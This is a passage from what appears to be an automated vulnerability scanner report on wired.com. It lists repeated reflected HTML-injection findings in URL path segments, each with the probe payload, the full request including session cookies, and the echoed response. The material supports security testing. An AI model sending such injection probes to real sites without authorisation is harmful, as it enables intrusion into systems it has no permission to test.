Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:34 GMT
Date: Sun, 21 Nov 2010 23:10:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries52754"><a>779fdc29594 c_news">
...[SNIP]...

1.646. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0411 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0411

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c53d"><a>70481f04aba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news1c53d"><a>70481f04aba/2007/04/dayintech_0411 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:45 GMT
Date: Sun, 21 Nov 2010 23:10:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news1c53d"><a>70481f04aba">
...[SNIP]...

1.647. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0426 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0426

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2f61"><a>cb8010c293b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencee2f61"><a>cb8010c293b/discoveries/news/2007/04/dayintech_0426 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:51 GMT
Date: Sun, 21 Nov 2010 23:09:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencee2f61"><a>cb8010c293b ss_discoveries c_news">
...[SNIP]...

1.648. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0426 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0426

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76756"><a>179b35b8b9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries76756"><a>179b35b8b9f/news/2007/04/dayintech_0426 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:21 GMT
Date: Sun, 21 Nov 2010 23:10:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries76756"><a>179b35b8b9f c_news">
...[SNIP]...

1.649. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0426 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0426

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e6c7"><a>f3b3a70bcbe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news7e6c7"><a>f3b3a70bcbe/2007/04/dayintech_0426 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:37 GMT
Date: Sun, 21 Nov 2010 23:10:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news7e6c7"><a>f3b3a70bcbe">
...[SNIP]...

1.650. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0427 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0427

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78e8c"><a>82286881d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science78e8c"><a>82286881d2/discoveries/news/2007/04/dayintech_0427 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:40 GMT
Date: Sun, 21 Nov 2010 23:09:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science78e8c"><a>82286881d2 ss_discoveries c_news">
...[SNIP]...

1.651. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0427 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0427

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82709"><a>31e9f734c89 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries82709"><a>31e9f734c89/news/2007/04/dayintech_0427 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:08 GMT
Date: Sun, 21 Nov 2010 23:10:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries82709"><a>31e9f734c89 c_news">
...[SNIP]...

1.652. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0427 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0427

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59461"><a>c9541460a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news59461"><a>c9541460a9/2007/04/dayintech_0427 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:27 GMT
Date: Sun, 21 Nov 2010 23:10:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news59461"><a>c9541460a9">
...[SNIP]...

1.653. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0503 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0503

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2efb"><a>fefb1eda5ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencee2efb"><a>fefb1eda5ce/discoveries/news/2007/05/dayintech_0503 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:15 GMT
Date: Sun, 21 Nov 2010 23:10:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencee2efb"><a>fefb1eda5ce ss_discoveries c_news">
...[SNIP]...

1.654. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0503 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0503

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60a82"><a>54e3f66b7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries60a82"><a>54e3f66b7a/news/2007/05/dayintech_0503 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:39 GMT
Date: Sun, 21 Nov 2010 23:10:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries60a82"><a>54e3f66b7a c_news">
...[SNIP]...

1.655. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0503 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0503

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91895"><a>1c7fed98e1a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news91895"><a>1c7fed98e1a/2007/05/dayintech_0503 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:54 GMT
Date: Sun, 21 Nov 2010 23:10:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news91895"><a>1c7fed98e1a">
...[SNIP]...

1.656. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0515 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0515

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95176"><a>ea0344b1c10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science95176"><a>ea0344b1c10/discoveries/news/2007/05/dayintech_0515 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:45 GMT
Date: Sun, 21 Nov 2010 23:10:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science95176"><a>ea0344b1c10 ss_discoveries c_news">
...[SNIP]...

1.657. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0515 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0515

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d23ae"><a>0f5c0610fda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesd23ae"><a>0f5c0610fda/news/2007/05/dayintech_0515 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:06 GMT
Date: Sun, 21 Nov 2010 23:11:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesd23ae"><a>0f5c0610fda c_news">
...[SNIP]...

1.658. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0515 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0515

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30df0"><a>9cafe32651a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news30df0"><a>9cafe32651a/2007/05/dayintech_0515 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:20 GMT
Date: Sun, 21 Nov 2010 23:11:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news30df0"><a>9cafe32651a">
...[SNIP]...

1.659. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0524 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0524

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca5ec"><a>c25249c30fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienceca5ec"><a>c25249c30fc/discoveries/news/2007/05/dayintech_0524 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:22 GMT
Date: Sun, 21 Nov 2010 23:10:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienceca5ec"><a>c25249c30fc ss_discoveries c_news">
...[SNIP]...

1.660. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0524 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0524

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0442"><a>9e37c4acab2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriese0442"><a>9e37c4acab2/news/2007/05/dayintech_0524 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:43 GMT
Date: Sun, 21 Nov 2010 23:10:43 GMT
Connection: close


